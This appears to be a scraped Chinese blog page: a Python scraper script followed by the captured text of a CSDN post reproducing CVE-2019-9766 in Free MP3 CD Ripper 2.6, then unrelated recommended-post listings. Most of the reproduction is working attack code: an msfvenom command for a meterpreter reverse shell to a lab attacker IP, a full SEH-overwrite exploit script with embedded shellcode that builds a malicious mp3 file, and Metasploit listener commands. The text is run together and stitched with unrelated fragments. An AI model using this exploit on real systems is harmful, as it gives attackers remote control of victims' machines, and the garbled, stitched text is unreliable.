代码:

import requests
import bs4
from bs4 import BeautifulSoup
import ress = ''
headers = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36'}r = requests.get("https://blog.csdn.net/darkhq/article/details/88989236", headers = headers)
print(r.status_code)
soup = BeautifulSoup(r.text, "lxml")
print('标题:'+str(soup.title))
big_info = soup.find_all(id = 'content_views')big_soup = BeautifulSoup(str(big_info),"lxml")for p in big_soup.find_all('p'):if isinstance(p, bs4.element.Tag):img = "<img"if img in str(p):p = re.findall('src="(.*?)"/>', str(p))#匹配!ss += '\n********下方为图片链接********\n\n'+str(p[0])+'\n\n'else:pat = re.compile('<[^>]+>')  # 去掉尖括号里面的东西p = pat.sub('', str(p))ss += str(p) + '\n'print('博客文章长度:'+str(len(ss)))
#print(ss)
with open(str(soup.title.string)+'.doc','a+', encoding='utf-8') as ff:ff.write(ss)ff.close()print('success write!')

运行:

结果:

内容:

[
一.漏洞描述
Free MP3 CD Ripper是一款音频格式转换器。Free MP3 CD Ripper 2.6版本中存在栈缓冲区溢出漏洞。远程攻击者可借助特制的.mp3文件利用该漏洞执行任意代码。
二.环境搭建
1.攻击机:kali2019                    ip:192.168.0.171
2.靶机:windows10       安装Free MP3 CD Ripper 2.6版本         ip:192.168.0.160
三.漏洞复现
1.利用msf生成反向连接的shellcode,msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.171 lport=888 -f c --smallest********下方为图片链接********https://img-blog.csdnimg.cn/20190403103117694.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0RhcmtIUQ==,size_16,color_FFFFFF,t_70" width="7382.替换脚本中的shellcode.
# Stack-based buffer overflow in Free MP3 CD Ripper 2.6buffer = "A" * 4116
NSEH = "\xeb\x06\x90\x90"
SEH = "\x84\x20\xe4\x66"
nops = "\x90" * 5buf = ""
buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
buf += "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
buf += "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
buf += "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
buf += "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
buf += "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
buf += "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
buf += "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
buf += "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
buf += "\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
buf += "\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54"
buf += "\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x00\xab"
buf += "\x68\x02\x00\x03\x78\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50"
buf += "\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"
buf += "\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0"
buf += "\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8"
buf += "\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00"
buf += "\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68"
buf += "\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x75\xee\xc3"
pad = "B" * (316 - len(nops) - len(buf) )
payload = buffer + NSEH + SEH + nops + buf +padtry:f=open("TestFMCR.mp3","w")print "[+] Creating %s bytes mp3 File..." %len(payload)f.write(payload)f.close()print "[+] mp3 File created successfully!"
except:print "File cannot be created!"
3.运行脚本,生成恶意mp3文件,python FmcrExploit.py********下方为图片链接********https://img-blog.csdnimg.cn/20190403103421897.png" width="4714.移动恶意文件到靶机windows10上********下方为图片链接********https://img-blog.csdnimg.cn/2019040310352849.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0RhcmtIUQ==,size_16,color_FFFFFF,t_70" width="3995.打开msf并设置监听
msfconsole********下方为图片链接********https://img-blog.csdnimg.cn/20190403103626470.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0RhcmtIUQ==,size_16,color_FFFFFF,t_70" width="728use exploit/multi/handler
set lhost 192.168.0.171
set lport 888
set payload windows/meterpreter/reverse_tcp********下方为图片链接********https://img-blog.csdnimg.cn/20190403103646652.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0RhcmtIUQ==,size_16,color_FFFFFF,t_70" width="7296.运行exploit********下方为图片链接********https://img-blog.csdnimg.cn/20190403103815314.png" width="5427.返回靶机,利用Free MP3 CD Ripper打开文件********下方为图片链接********https://img-blog.csdnimg.cn/20190403104117694.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0RhcmtIUQ==,size_16,color_FFFFFF,t_70" width="6188.返回kali,已经与靶机建立连接********下方为图片链接********https://img-blog.csdnimg.cn/2019040310433465.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0RhcmtIUQ==,size_16,color_FFFFFF,t_70" width="658四.修复建议
1.及时更新Free MP3 CD Ripper到最新版本感谢各位大佬赏脸,有什么不足的地方请多多指教,谢谢!!!

成功爬取CVE-2019-9766漏洞复现【CSDN】【1】相关推荐

  1. python成功爬取拉勾网——初识反爬(一个小白真实的爬取路程,内容有点小多)

    python成功爬取拉勾网(一个小白的心里路程) 最开始想爬取拉钩是因为半年前上python实验课的时候,老师给了两个任务,一个时爬取糗百的笑话内容,另一个时爬取拉勾网的职位信息,当时因为课时紧张的缘 ...

  2. JS+Selenium+excel追加写入,使用python成功爬取京东任何商品

    之前一直是requests库做爬虫,这次尝试下使用selenium做爬虫,效率不高,但是却没有限制,文章是分别结合大牛的selenium爬虫以及excel追加写入操作而成,还有待优化,打算爬取更多信息 ...

  3. 【Python爬虫学习】七、淘宝商品价格爬取(成功爬取)

    写在前面:修改request的headers属性,可以跳过登录界面,爬取成功 功能描述: 目标:获取淘宝搜索页面信息,提取其中商品的名称和价格 技术路线:Requests-Re 接口描述: 搜索接口: ...

  4. 约等于全自动爬取CVE基础信息

    套用之前的思路,设置一个记录的东西! 手工部分: 创建一个记事本,并赋予初始数值1 在列表的最后,添加0[后面有用!] 用一个记事本来记录每次的i数值: 开始,读取i数值:with open(&quo ...

  5. python爬虫外贸客户_python实战成功爬取海外批发商价格信息并写入记事本

    运行平台:windows Python版本:Python 3.7.0 用到的第三方库:requests ,Beautiful Soup,re IDE:jupyter notebook 浏览器:Chro ...

  6. 破解安居家数字加密成功爬取

    前两天做到爬取租房网站的一个爬虫题目诈一看还挺简单(之前从来没有爬过租房网站)下一刻我就后悔了里面的数字竟然是乱码瞬间不知所措(奔溃边缘徘徊)就是这个东西这是个嘛 也没学过类似于这种解码的东东然后就疯 ...

  7. 【Python爬虫学习】八、股票数据定向爬虫(2020年1月31日成功爬取中财网,百度股市通web版404了)

    功能描述: 目标:获取股票的名称和交易信息 输出:保存到文件中 程序结构设计: 步骤1:从中财网http://quote.cfi.cn/stockList.aspx获取股票列表 步骤2:根据股票列表获 ...

  8. python实战——股票数据Scrapy爬虫(成功爬取)

    股票数据scrapy爬虫 功能描述 技术路线:scrapy 目标:获取上交所和深交所所有股票的名称和交易信息 输出:保存到文件中 数据网站的确定 获取股票列表:   东方财富网:http://quot ...

  9. 成功爬取-CVE-2018-15982漏洞复现【博客园】【1】

    代码: import requests import bs4 from bs4 import BeautifulSoup import ress = '' headers = {'user-agent ...

最新文章

  1. 提高网站访问性能——Tomcat优化
  2. 聊天记录存redis还是mysql_一个小小的签到功能,到底用MySQL还是Redis?
  3. 将代码从windows移动linux上出现^M错误的解决方法
  4. NHibernate学习笔记(二):one-to-one关系映射
  5. 论文浅尝 | 基于模式的时间表达式识别
  6. 【UML】UML扩展的建模概念
  7. html模拟在线股票走势,用HTML5实现全套股票行情图
  8. 挂载jffs2文件系统遇到的问题
  9. .bash_profile和.bashrc的什么区别
  10. Go开源项目 - gorp使用方法
  11. C++ 五课时入门教学
  12. SDS启动失败,提示连接primary节点失败
  13. 计算机卡登录界面,windows10系统卡在登录界面的解决方法
  14. 阿里云建站保证百度收录3000+网站模板
  15. filter()函数使用
  16. 华三H3C端口聚合与链路聚合
  17. 一篇文章带你理解套接字Socket的各个接口
  18. Android 对apk进行重签名和查看签名(window 和mac)及生成签名
  19. SAP 创建会计冲销凭证
  20. java中getter和setter,Java中的Getter和Setter

热门文章

  1. 阿里、京东、快手、华为......他们是如何构建一个个推荐系统“帝国”的?
  2. 微软提出极低资源下语音合成与识别新方法,小语种不怕没数据!| ICML 2019
  3. 回顾与展望:大热的AutoML究竟是什么? | 技术头条
  4. 微信真要做操作系统了?
  5. 消息幂等(去重)通用解决方案,真顶!
  6. 不要再自己封装各种Util工具类了,这款神仙级框架你值得拥有!
  7. 一个比 Spring Boot 快 44 倍的 Java 框架
  8. 酸爽! Intellij IDEA 神器居然还藏着这些实用小技巧 !
  9. 面试再被问到 ConcurrentHashMap,把这篇文章甩给他!
  10. 我用Java+SeimiCrawler+Redis+ES+Kibana技术对数百万知乎用户进行了数据分析,得到了这些......